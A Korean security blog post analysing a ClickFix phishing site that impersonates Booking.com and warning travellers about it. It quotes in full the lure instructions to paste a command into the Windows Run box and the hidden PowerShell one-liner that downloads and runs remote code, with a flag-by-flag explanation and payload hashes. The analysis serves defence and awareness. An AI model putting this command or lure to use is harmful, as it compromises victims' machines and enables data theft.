부킹닷컴은 호텔 등의 숙박 시설에 대한 온라인 예약을 다루는 웹사이트 및 애플리케이션 프로그램이며
호텔 등의 숙박 시설에 대한 온라인 예약을 다루는 웹사이트 및 애플리케이션 프로그램입니다.
부킹 홀딩스(Booking Holdings Inc.)는 전 세계적으로 온라인 여행 예약 및 관련 서비스를 제공하는 글로벌 선도 기업 이면서 주요 사업 모델은 다양한 온라인,모바일 플랫폼을 통해 숙박,항공,렌터카,크루즈,여행 패키지, 레스토랑 예약 및 결제 서비스를 제공하고 있습니다.
해당 사이트를 이용하면 쉽게 해외 여행 같은 것을 가는 데 도움이 됩니다. 일단 오늘은 부킹 닷컴(Booking) 피싱 사이트를 악용한 클릭픽스 공격(Clickfix)에 대해 알아보겠습니다. 뭐~클릭픽스 공격(Clickfix)에 대해서는 다 아니까? 넘어가도록 하겠습니다.
피싱 사이트
hxxps://admin-properties-captcha(.)com해당 목적은 가짜 CAPTCHA 를 보여 주고 사용자가 I'm not a robot를 확인을 하면 윈도우 화면에서 복사 붙여 넣기를 통한 사용자가 Powershell를 실행을 시키는 것이 목적입니다.
악성 Powershell 코드
powershell -WindowStyle Hidden -ExecutionPolicy Bypass -NoProfile -Command "iex
((New-Object Net.WebClient).DownloadString('hxxps://bknpnt(.)c
om/bkngpntqow'))"인 것을 확인할 수가 있으며 클릭을 유도하는 메시지는 다음과 같습니다.
booking Verification
To ensure the security of your connection, please complete the verification steps below.
Instructions
Press Windows + R on your keyboard.
Paste the command using CTRL + V.
Press Enter to complete verification.
After completing the steps, you will see a confirmation message.
When done, click Verify below.
악성코드 분석
1.powershell
당연히 해당 명령은 PowerShell 실행 파일을 호출
2.WindowStyle Hidden
PowerShell을 실행할 때의 창 스타일(WindowStyle)을 설정하고 해당 옵션은 Hidden(숨김)으로 설정되어 있어 실행 시 PowerShell 창이 화면에 나타나지 않아서 사용자는 모름
3.-ExecutionPolicy Bypass
PowerShell의 스크립트 실행 정책을 설정을 Bypass 로 실행 정책을 완전히 무시하고 어떤 스크립트든 실행할 수 있게 함
일반적으로 PowerShell은 다음과 같은 실행 정책을 시행하고 있다.:
4.-NoProfile
-NoProfile: PowerShell 시작 시 사용자 프로필 스크립트(Microsoft.PowerShell_profile.ps1)를 로드하지 않으며 해당 스크립트 실행 속도를 빠르게 하거나 프로필 스크립트에 포함된 잠재적인 충돌을 피하고자 사용될 수 있음
1. 속도 향상: 불필요한 프로파일 로딩 생략
2. 충돌 방지: 사용자 정의 변수/함수와의 충돌 방지
3. 탐지 회피: 사용자 환경에 따라 로깅이 추가될 가능성 차단
5. Command: 뒤따르는 문자열을 PowerShell 명령어로 즉시 실행
명령은 전체적으로 다음 명령을 따라갑니다.
6.내부 실행 블록 상세 분석
New-Object Net.WebClient.NET Framework 클래스 중 하나인 System.Net.WebClient 객체를 생성 해당 객체는 HTTP 또는 HTTPS를 통해 외부 URL로부터 데이터를 가져 옵니다.
PowerShell 에서는 New-Object 명령어로 .NET 객체를 동적으로 생성
생성된 WebClient는 이후 .DownloadString() 메서드를 사용하여 문자열 악성코드 다운로드
.DownloadString(hxxps://bknpnt(.)com/bkngpntqow)
생성한 WebClient 객체를 통해 HTTPS 프로토콜로 지정된 악성 URL에 접속하고 응답으로 전달되는 내용을 텍스트 문자열로 그대로 읽어들이는 동시에 해당 exe 파일을 통해서 악성코드를 실행되고 개인정보를 유출하는 방식을 사용하고 있습니다.
다운로드 악성코드 해쉬
MD5:7e4ff64f750bc801ff4839be27d945b7
SHA256:404f55e7aa854f7df700f2b93b4a31d0f13dde464e74985ca9bc98ba6224cc93
메모리에 직접 다운로드 하고 디스크에 기록하지 않고 실행하는 것이 가능합니다.
뭐~이런저런 것들을 가지고 많이 해킹을 시도하고 있으니 해외 여행을 다니시는 분들은 이메일을 확인할 때 주의가 필요합니다. 그리고 저런 식으로 실행을 유도하면 100%라고 생각을 하시면 됩니다.🛢️
'소프트웨어 팁 > 보안 및 분석' 카테고리의 다른 글
| 일본어 로 제작이 된 클릭픽스(ClickFix) 공격 사이트-soubtcevent(.)com(2025.7.17) (0) | 2025.07.23 |
|---|---|
| ExpressVPN 버그로 인해 원격 데스크톱 세션에서 사용자 IP 유출 (0) | 2025.07.22 |
| 주적 북한 해킹 단체 코니(Konni)에서 제작한 악성코드-자금출처명세서.lnk(2025.5.28) (0) | 2025.07.21 |
| 스마트폰 충전 중 스마트폰 해킹 초이스재킹(Choice Jacking) 예방 방법 (0) | 2025.07.18 |
| 애플 맥(Apple macOS) 맥북 저장 공간 확보를 악용한 클릭픽스(ClickFix) 공격 사이트 간단 분석(2025.7.11) (0) | 2025.07.16 |
| 김수키(Kimsuky)에서 제작한 네이버 블로그 제한 안내 드립니다.피싱 메일 분석(2025.6.30) (0) | 2025.07.15 |
| 위쳇(Wechat)으로 위장한 스테가노그래피(Steganography)를 악용한 악성코드-Meterpreter 백도어(2024.5.29) (2) | 2025.07.14 |
| 러시아 프로 농구 선수 다닐 카사트킨 (Daniil Kasatkin) 랜섬웨어 공격에 가담한 혐의로 체포 (0) | 2025.07.13 |
